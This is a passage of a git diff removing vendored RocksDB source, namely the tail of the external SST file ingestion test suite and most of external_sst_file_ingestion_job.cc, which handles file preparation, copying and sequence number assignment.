-      s = db_->IngestExternalFile({file_path}, ifo);
-    }
-    return s;
-  }
-
-  Status GenerateAndAddExternalFile(
-      const Options options, std::vector<int> keys, const ValueType value_type,
-      int file_id, std::map<std::string, std::string>* true_data) {
-    return GenerateAndAddExternalFile(options, keys,
-                                      std::vector<ValueType>(1, value_type),
-                                      file_id, true_data);
-  }
-
-  ~ExternalSSTFileBasicTest() { test::DestroyDir(env_, sst_files_dir_); }
-
- protected:
-  std::string sst_files_dir_;
-};
-
-TEST_F(ExternalSSTFileBasicTest, Basic) {
-  Options options = CurrentOptions();
-
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  // Current file size should be 0 after sst_file_writer init and before open a
-  // file.
-  ASSERT_EQ(sst_file_writer.FileSize(), 0);
-
-  // file1.sst (0 => 99)
-  std::string file1 = sst_files_dir_ + "file1.sst";
-  ASSERT_OK(sst_file_writer.Open(file1));
-  for (int k = 0; k < 100; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file1_info;
-  Status s = sst_file_writer.Finish(&file1_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-
-  // Current file size should be non-zero after success write.
-  ASSERT_GT(sst_file_writer.FileSize(), 0);
-
-  ASSERT_EQ(file1_info.file_path, file1);
-  ASSERT_EQ(file1_info.num_entries, 100);
-  ASSERT_EQ(file1_info.smallest_key, Key(0));
-  ASSERT_EQ(file1_info.largest_key, Key(99));
-  // sst_file_writer already finished, cannot add this value
-  s = sst_file_writer.Put(Key(100), "bad_val");
-  ASSERT_FALSE(s.ok()) << s.ToString();
-
-  DestroyAndReopen(options);
-  // Add file using file path
-  s = DeprecatedAddFile({file1});
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(db_->GetLatestSequenceNumber(), 0U);
-  for (int k = 0; k < 100; k++) {
-    ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-  }
-
-  DestroyAndRecreateExternalSSTFilesDir();
-}
-
-TEST_F(ExternalSSTFileBasicTest, NoCopy) {
-  Options options = CurrentOptions();
-  const ImmutableCFOptions ioptions(options);
-
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  // file1.sst (0 => 99)
-  std::string file1 = sst_files_dir_ + "file1.sst";
-  ASSERT_OK(sst_file_writer.Open(file1));
-  for (int k = 0; k < 100; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file1_info;
-  Status s = sst_file_writer.Finish(&file1_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file1_info.file_path, file1);
-  ASSERT_EQ(file1_info.num_entries, 100);
-  ASSERT_EQ(file1_info.smallest_key, Key(0));
-  ASSERT_EQ(file1_info.largest_key, Key(99));
-
-  // file2.sst (100 => 299)
-  std::string file2 = sst_files_dir_ + "file2.sst";
-  ASSERT_OK(sst_file_writer.Open(file2));
-  for (int k = 100; k < 300; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file2_info;
-  s = sst_file_writer.Finish(&file2_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file2_info.file_path, file2);
-  ASSERT_EQ(file2_info.num_entries, 200);
-  ASSERT_EQ(file2_info.smallest_key, Key(100));
-  ASSERT_EQ(file2_info.largest_key, Key(299));
-
-  // file3.sst (110 => 124) .. overlap with file2.sst
-  std::string file3 = sst_files_dir_ + "file3.sst";
-  ASSERT_OK(sst_file_writer.Open(file3));
-  for (int k = 110; k < 125; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val_overlap"));
-  }
-  ExternalSstFileInfo file3_info;
-  s = sst_file_writer.Finish(&file3_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file3_info.file_path, file3);
-  ASSERT_EQ(file3_info.num_entries, 15);
-  ASSERT_EQ(file3_info.smallest_key, Key(110));
-  ASSERT_EQ(file3_info.largest_key, Key(124));
-  s = DeprecatedAddFile({file1}, true /* move file */);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(Status::NotFound(), env_->FileExists(file1));
-
-  s = DeprecatedAddFile({file2}, false /* copy file */);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_OK(env_->FileExists(file2));
-
-  // This file have overlapping values with the existing data
-  s = DeprecatedAddFile({file2}, true /* move file */);
-  ASSERT_FALSE(s.ok()) << s.ToString();
-  ASSERT_OK(env_->FileExists(file3));
-
-  for (int k = 0; k < 300; k++) {
-    ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-  }
-}
-
-TEST_F(ExternalSSTFileBasicTest, IngestFileWithGlobalSeqnoPickedSeqno) {
-  do {
-    Options options = CurrentOptions();
-    DestroyAndReopen(options);
-    std::map<std::string, std::string> true_data;
-
-    int file_id = 1;
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {1, 2, 3, 4, 5, 6},
-                                         ValueType::kTypeValue, file_id++,
-                                         &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {10, 11, 12, 13},
-                                         ValueType::kTypeValue, file_id++,
-
-                                         &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 4, 6}, ValueType::kTypeValue, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {11, 15, 19}, ValueType::kTypeValue, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {120, 130}, ValueType::kTypeValue, file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 130}, ValueType::kTypeValue, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 3);
-
-    // Write some keys through normal write path
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(i), "memtable"));
-      true_data[Key(i)] = "memtable";
-    }
-    SequenceNumber last_seqno = dbfull()->GetLatestSequenceNumber();
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {60, 61, 62}, ValueType::kTypeValue, file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {40, 41, 42}, ValueType::kTypeValue, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {20, 30, 40}, ValueType::kTypeValue, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 2);
-
-    const Snapshot* snapshot = db_->GetSnapshot();
-
-    // We will need a seqno for the file regardless if the file overwrite
-    // keys in the DB or not because we have a snapshot
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1000, 1002}, ValueType::kTypeValue, file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 3);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {2000, 3002}, ValueType::kTypeValue, file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 4);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {1, 20, 40, 100, 150},
-                                         ValueType::kTypeValue, file_id++,
-                                         &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    db_->ReleaseSnapshot(snapshot);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {5000, 5001}, ValueType::kTypeValue, file_id++, &true_data));
-    // No snapshot anymore, no need to assign a seqno
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    size_t kcnt = 0;
-    VerifyDBFromMap(true_data, &kcnt, false);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(ExternalSSTFileBasicTest, IngestFileWithMultipleValueType) {
-  do {
-    Options options = CurrentOptions();
-    options.merge_operator.reset(new TestPutOperator());
-    DestroyAndReopen(options);
-    std::map<std::string, std::string> true_data;
-
-    int file_id = 1;
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {1, 2, 3, 4, 5, 6},
-                                         ValueType::kTypeValue, file_id++,
-                                         &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {10, 11, 12, 13},
-                                         ValueType::kTypeValue, file_id++,
-
-                                         &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 4, 6}, ValueType::kTypeMerge, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {11, 15, 19},
-                                         ValueType::kTypeDeletion, file_id++,
-                                         &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {120, 130}, ValueType::kTypeMerge, file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 130}, ValueType::kTypeDeletion, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 3);
-
-    // Write some keys through normal write path
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(i), "memtable"));
-      true_data[Key(i)] = "memtable";
-    }
-    SequenceNumber last_seqno = dbfull()->GetLatestSequenceNumber();
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {60, 61, 62}, ValueType::kTypeValue, file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {40, 41, 42}, ValueType::kTypeMerge, file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {20, 30, 40},
-                                         ValueType::kTypeDeletion, file_id++,
-                                         &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 2);
-
-    const Snapshot* snapshot = db_->GetSnapshot();
-
-    // We will need a seqno for the file regardless if the file overwrite
-    // keys in the DB or not because we have a snapshot
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1000, 1002}, ValueType::kTypeMerge, file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 3);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {2000, 3002}, ValueType::kTypeMerge, file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 4);
-
-    ASSERT_OK(GenerateAndAddExternalFile(options, {1, 20, 40, 100, 150},
-                                         ValueType::kTypeMerge, file_id++,
-                                         &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    db_->ReleaseSnapshot(snapshot);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {5000, 5001}, ValueType::kTypeValue, file_id++, &true_data));
-    // No snapshot anymore, no need to assign a seqno
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    size_t kcnt = 0;
-    VerifyDBFromMap(true_data, &kcnt, false);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(ExternalSSTFileBasicTest, IngestFileWithMixedValueType) {
-  do {
-    Options options = CurrentOptions();
-    options.merge_operator.reset(new TestPutOperator());
-    DestroyAndReopen(options);
-    std::map<std::string, std::string> true_data;
-
-    int file_id = 1;
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 2, 3, 4, 5, 6},
-        {ValueType::kTypeValue, ValueType::kTypeMerge, ValueType::kTypeValue,
-         ValueType::kTypeMerge, ValueType::kTypeValue, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {10, 11, 12, 13},
-        {ValueType::kTypeValue, ValueType::kTypeMerge, ValueType::kTypeValue,
-         ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 0);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 4, 6}, {ValueType::kTypeDeletion, ValueType::kTypeValue,
-                             ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {11, 15, 19}, {ValueType::kTypeDeletion, ValueType::kTypeMerge,
-                                ValueType::kTypeValue},
-        file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {120, 130}, {ValueType::kTypeValue, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 2);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 130}, {ValueType::kTypeMerge, ValueType::kTypeDeletion},
-        file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), 3);
-
-    // Write some keys through normal write path
-    for (int i = 0; i < 50; i++) {
-      ASSERT_OK(Put(Key(i), "memtable"));
-      true_data[Key(i)] = "memtable";
-    }
-    SequenceNumber last_seqno = dbfull()->GetLatestSequenceNumber();
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {60, 61, 62},
-        {ValueType::kTypeValue, ValueType::kTypeMerge, ValueType::kTypeValue},
-        file_id++, &true_data));
-    // File dont overwrite any keys, No seqno needed
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {40, 41, 42}, {ValueType::kTypeValue, ValueType::kTypeDeletion,
-                                ValueType::kTypeDeletion},
-        file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 1);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {20, 30, 40},
-        {ValueType::kTypeDeletion, ValueType::kTypeDeletion,
-         ValueType::kTypeDeletion},
-        file_id++, &true_data));
-    // File overwrite some keys, a seqno will be assigned
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 2);
-
-    const Snapshot* snapshot = db_->GetSnapshot();
-
-    // We will need a seqno for the file regardless if the file overwrite
-    // keys in the DB or not because we have a snapshot
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1000, 1002}, {ValueType::kTypeValue, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 3);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {2000, 3002}, {ValueType::kTypeValue, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 4);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {1, 20, 40, 100, 150},
-        {ValueType::kTypeDeletion, ValueType::kTypeDeletion,
-         ValueType::kTypeValue, ValueType::kTypeMerge, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // A global seqno will be assigned anyway because of the snapshot
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    db_->ReleaseSnapshot(snapshot);
-
-    ASSERT_OK(GenerateAndAddExternalFile(
-        options, {5000, 5001}, {ValueType::kTypeValue, ValueType::kTypeMerge},
-        file_id++, &true_data));
-    // No snapshot anymore, no need to assign a seqno
-    ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno + 5);
-
-    size_t kcnt = 0;
-    VerifyDBFromMap(true_data, &kcnt, false);
-  } while (ChangeCompactOptions());
-}
-
-TEST_F(ExternalSSTFileBasicTest, FadviseTrigger) {
-  Options options = CurrentOptions();
-  const int kNumKeys = 10000;
-
-  size_t total_fadvised_bytes = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "SstFileWriter::Rep::InvalidatePageCache", [&](void* arg) {
-        size_t fadvise_size = *(reinterpret_cast<size_t*>(arg));
-        total_fadvised_bytes += fadvise_size;
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  std::unique_ptr<SstFileWriter> sst_file_writer;
-
-  std::string sst_file_path = sst_files_dir_ + "file_fadvise_disable.sst";
-  sst_file_writer.reset(
-      new SstFileWriter(EnvOptions(), options, nullptr, false));
-  ASSERT_OK(sst_file_writer->Open(sst_file_path));
-  for (int i = 0; i < kNumKeys; i++) {
-    ASSERT_OK(sst_file_writer->Put(Key(i), Key(i)));
-  }
-  ASSERT_OK(sst_file_writer->Finish());
-  // fadvise disabled
-  ASSERT_EQ(total_fadvised_bytes, 0);
-
-  sst_file_path = sst_files_dir_ + "file_fadvise_enable.sst";
-  sst_file_writer.reset(
-      new SstFileWriter(EnvOptions(), options, nullptr, true));
-  ASSERT_OK(sst_file_writer->Open(sst_file_path));
-  for (int i = 0; i < kNumKeys; i++) {
-    ASSERT_OK(sst_file_writer->Put(Key(i), Key(i)));
-  }
-  ASSERT_OK(sst_file_writer->Finish());
-  // fadvise enabled
-  ASSERT_EQ(total_fadvised_bytes, sst_file_writer->FileSize());
-  ASSERT_GT(total_fadvised_bytes, 0);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileBasicTest, IngestionWithRangeDeletions) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = true;
-  Reopen(options);
-
-  std::map<std::string, std::string> true_data;
-  int file_id = 1;
-  // prevent range deletions from being dropped due to becoming obsolete.
-  const Snapshot* snapshot = db_->GetSnapshot();
-
-  // range del [0, 50) in L0 file, [50, 100) in memtable
-  for (int i = 0; i < 2; i++) {
-    if (i == 1) {
-      db_->Flush(FlushOptions());
-    }
-    ASSERT_OK(db_->DeleteRange(WriteOptions(), db_->DefaultColumnFamily(),
-                               Key(50 * i), Key(50 * (i + 1))));
-  }
-  ASSERT_EQ(1, NumTableFilesAtLevel(0));
-
-  // overlaps with L0 file but not memtable, so flush is skipped
-  SequenceNumber last_seqno = dbfull()->GetLatestSequenceNumber();
-  ASSERT_OK(GenerateAndAddExternalFile(
-      options, {10, 40}, {ValueType::kTypeValue, ValueType::kTypeValue},
-      file_id++, &true_data));
-  ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), ++last_seqno);
-  ASSERT_EQ(2, NumTableFilesAtLevel(0));
-
-  // overlaps with memtable, so flush is triggered (thus file count increases by
-  // two at this step).
-  ASSERT_OK(GenerateAndAddExternalFile(
-      options, {50, 90}, {ValueType::kTypeValue, ValueType::kTypeValue},
-      file_id++, &true_data));
-  ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), ++last_seqno);
-  ASSERT_EQ(4, NumTableFilesAtLevel(0));
-
-  // snapshot unneeded now that both range deletions are persisted
-  db_->ReleaseSnapshot(snapshot);
-
-  // overlaps with nothing, so places at bottom level and skips incrementing
-  // seqnum.
-  ASSERT_OK(GenerateAndAddExternalFile(
-      options, {101, 125}, {ValueType::kTypeValue, ValueType::kTypeValue},
-      file_id++, &true_data));
-  ASSERT_EQ(dbfull()->GetLatestSequenceNumber(), last_seqno);
-  ASSERT_EQ(4, NumTableFilesAtLevel(0));
-  ASSERT_EQ(1, NumTableFilesAtLevel(options.num_levels - 1));
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/external_sst_file_ingestion_job.cc b/thirdparty/rocksdb/db/external_sst_file_ingestion_job.cc
deleted file mode 100644
index 58fa354..0000000
--- a/thirdparty/rocksdb/db/external_sst_file_ingestion_job.cc
+++ /dev/null
@@ -1,665 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include "db/external_sst_file_ingestion_job.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <string>
-#include <vector>
-
-#include "db/version_edit.h"
-#include "table/merging_iterator.h"
-#include "table/scoped_arena_iterator.h"
-#include "table/sst_file_writer_collectors.h"
-#include "table/table_builder.h"
-#include "util/file_reader_writer.h"
-#include "util/file_util.h"
-#include "util/stop_watch.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-Status ExternalSstFileIngestionJob::Prepare(
-    const std::vector<std::string>& external_files_paths) {
-  Status status;
-
-  // Read the information of files we are ingesting
-  for (const std::string& file_path : external_files_paths) {
-    IngestedFileInfo file_to_ingest;
-    status = GetIngestedFileInfo(file_path, &file_to_ingest);
-    if (!status.ok()) {
-      return status;
-    }
-    files_to_ingest_.push_back(file_to_ingest);
-  }
-
-  for (const IngestedFileInfo& f : files_to_ingest_) {
-    if (f.cf_id !=
-            TablePropertiesCollectorFactory::Context::kUnknownColumnFamily &&
-        f.cf_id != cfd_->GetID()) {
-      return Status::InvalidArgument(
-          "External file column family id dont match");
-    }
-  }
-
-  const Comparator* ucmp = cfd_->internal_comparator().user_comparator();
-  auto num_files = files_to_ingest_.size();
-  if (num_files == 0) {
-    return Status::InvalidArgument("The list of files is empty");
-  } else if (num_files > 1) {
-    // Verify that passed files dont have overlapping ranges
-    autovector<const IngestedFileInfo*> sorted_files;
-    for (size_t i = 0; i < num_files; i++) {
-      sorted_files.push_back(&files_to_ingest_[i]);
-    }
-
-    std::sort(
-        sorted_files.begin(), sorted_files.end(),
-        [&ucmp](const IngestedFileInfo* info1, const IngestedFileInfo* info2) {
-          return ucmp->Compare(info1->smallest_user_key,
-                               info2->smallest_user_key) < 0;
-        });
-
-    for (size_t i = 0; i < num_files - 1; i++) {
-      if (ucmp->Compare(sorted_files[i]->largest_user_key,
-                        sorted_files[i + 1]->smallest_user_key) >= 0) {
-        return Status::NotSupported("Files have overlapping ranges");
-      }
-    }
-  }
-
-  for (IngestedFileInfo& f : files_to_ingest_) {
-    if (f.num_entries == 0) {
-      return Status::InvalidArgument("File contain no entries");
-    }
-
-    if (!f.smallest_internal_key().Valid() ||
-        !f.largest_internal_key().Valid()) {
-      return Status::Corruption("Generated table have corrupted keys");
-    }
-  }
-
-  // Copy/Move external files into DB
-  for (IngestedFileInfo& f : files_to_ingest_) {
-    f.fd = FileDescriptor(versions_->NewFileNumber(), 0, f.file_size);
-
-    const std::string path_outside_db = f.external_file_path;
-    const std::string path_inside_db =
-        TableFileName(db_options_.db_paths, f.fd.GetNumber(), f.fd.GetPathId());
-
-    if (ingestion_options_.move_files) {
-      status = env_->LinkFile(path_outside_db, path_inside_db);
-      if (status.IsNotSupported()) {
-        // Original file is on a different FS, use copy instead of hard linking
-        status = CopyFile(env_, path_outside_db, path_inside_db, 0,
-                          db_options_.use_fsync);
-      }
-    } else {
-      status = CopyFile(env_, path_outside_db, path_inside_db, 0,
-                        db_options_.use_fsync);
-    }
-    TEST_SYNC_POINT("DBImpl::AddFile:FileCopied");
-    if (!status.ok()) {
-      break;
-    }
-    f.internal_file_path = path_inside_db;
-  }
-
-  if (!status.ok()) {
-    // We failed, remove all files that we copied into the db
-    for (IngestedFileInfo& f : files_to_ingest_) {
-      if (f.internal_file_path == "") {
-        break;
-      }
-      Status s = env_->DeleteFile(f.internal_file_path);
-      if (!s.ok()) {
-        ROCKS_LOG_WARN(db_options_.info_log,
-                       "AddFile() clean up for file %s failed : %s",
-                       f.internal_file_path.c_str(), s.ToString().c_str());
-      }
-    }
-  }
-
-  return status;
-}
-
-Status ExternalSstFileIngestionJob::NeedsFlush(bool* flush_needed) {
-  SuperVersion* super_version = cfd_->GetSuperVersion();
-  Status status =
-      IngestedFilesOverlapWithMemtables(super_version, flush_needed);
-
-  if (status.ok() && *flush_needed &&
-      !ingestion_options_.allow_blocking_flush) {
-    status = Status::InvalidArgument("External file requires flush");
-  }
-  return status;
-}
-
-// REQUIRES: we have become the only writer by entering both write_thread_ and
-// nonmem_write_thread_
-Status ExternalSstFileIngestionJob::Run() {
-  Status status;
-#ifndef NDEBUG
-  // We should never run the job with a memtable that is overlapping
-  // with the files we are ingesting
-  bool need_flush = false;
-  status = NeedsFlush(&need_flush);
-  assert(status.ok() && need_flush == false);
-#endif
-
-  bool consumed_seqno = false;
-  bool force_global_seqno = false;
-
-  if (ingestion_options_.snapshot_consistency && !db_snapshots_->empty()) {
-    // We need to assign a global sequence number to all the files even
-    // if the dont overlap with any ranges since we have snapshots
-    force_global_seqno = true;
-  }
-  // It is safe to use this instead of LastToBeWrittenSequence since we are
-  // the only active writer, and hence they are equal
-  const SequenceNumber last_seqno = versions_->LastSequence();
-  SuperVersion* super_version = cfd_->GetSuperVersion();
-  edit_.SetColumnFamily(cfd_->GetID());
-  // The levels that the files will be ingested into
-
-  for (IngestedFileInfo& f : files_to_ingest_) {
-    SequenceNumber assigned_seqno = 0;
-    if (ingestion_options_.ingest_behind) {
-      status = CheckLevelForIngestedBehindFile(&f);
-    } else {
-      status = AssignLevelAndSeqnoForIngestedFile(
-         super_version, force_global_seqno, cfd_->ioptions()->compaction_style,
-         &f, &assigned_seqno);
-    }
-    if (!status.ok()) {
-      return status;
-    }
-    status = AssignGlobalSeqnoForIngestedFile(&f, assigned_seqno);
-    TEST_SYNC_POINT_CALLBACK("ExternalSstFileIngestionJob::Run",
-                             &assigned_seqno);
-    if (assigned_seqno == last_seqno + 1) {
-      consumed_seqno = true;
-    }
-    if (!status.ok()) {
-      return status;
-    }
-    edit_.AddFile(f.picked_level, f.fd.GetNumber(), f.fd.GetPathId(),
-                  f.fd.GetFileSize(), f.smallest_internal_key(),
-                  f.largest_internal_key(), f.assigned_seqno, f.assigned_seqno,
-                  false);
-  }
-
-  if (consumed_seqno) {
-    versions_->SetLastToBeWrittenSequence(last_seqno + 1);
-    versions_->SetLastSequence(last_seqno + 1);
-  }
-
-  return status;
-}
-
-void ExternalSstFileIngestionJob::UpdateStats() {
-  // Update internal stats for new ingested files
-  uint64_t total_keys = 0;
-  uint64_t total_l0_files = 0;
-  uint64_t total_time = env_->NowMicros() - job_start_time_;
-  for (IngestedFileInfo& f : files_to_ingest_) {
-    InternalStats::CompactionStats stats(1);
-    stats.micros = total_time;
-    stats.bytes_written = f.fd.GetFileSize();
-    stats.num_output_files = 1;
-    cfd_->internal_stats()->AddCompactionStats(f.picked_level, stats);
-    cfd_->internal_stats()->AddCFStats(InternalStats::BYTES_INGESTED_ADD_FILE,
-                                       f.fd.GetFileSize());
-    total_keys += f.num_entries;
-    if (f.picked_level == 0) {
-      total_l0_files += 1;
-    }
-    ROCKS_LOG_INFO(
-        db_options_.info_log,
-        "[AddFile] External SST file %s was ingested in L%d with path %s "
-        "(global_seqno=%" PRIu64 ")\n",
-        f.external_file_path.c_str(), f.picked_level,
-        f.internal_file_path.c_str(), f.assigned_seqno);
-  }
-  cfd_->internal_stats()->AddCFStats(InternalStats::INGESTED_NUM_KEYS_TOTAL,
-                                     total_keys);
-  cfd_->internal_stats()->AddCFStats(InternalStats::INGESTED_NUM_FILES_TOTAL,
-                                     files_to_ingest_.size());
-  cfd_->internal_stats()->AddCFStats(
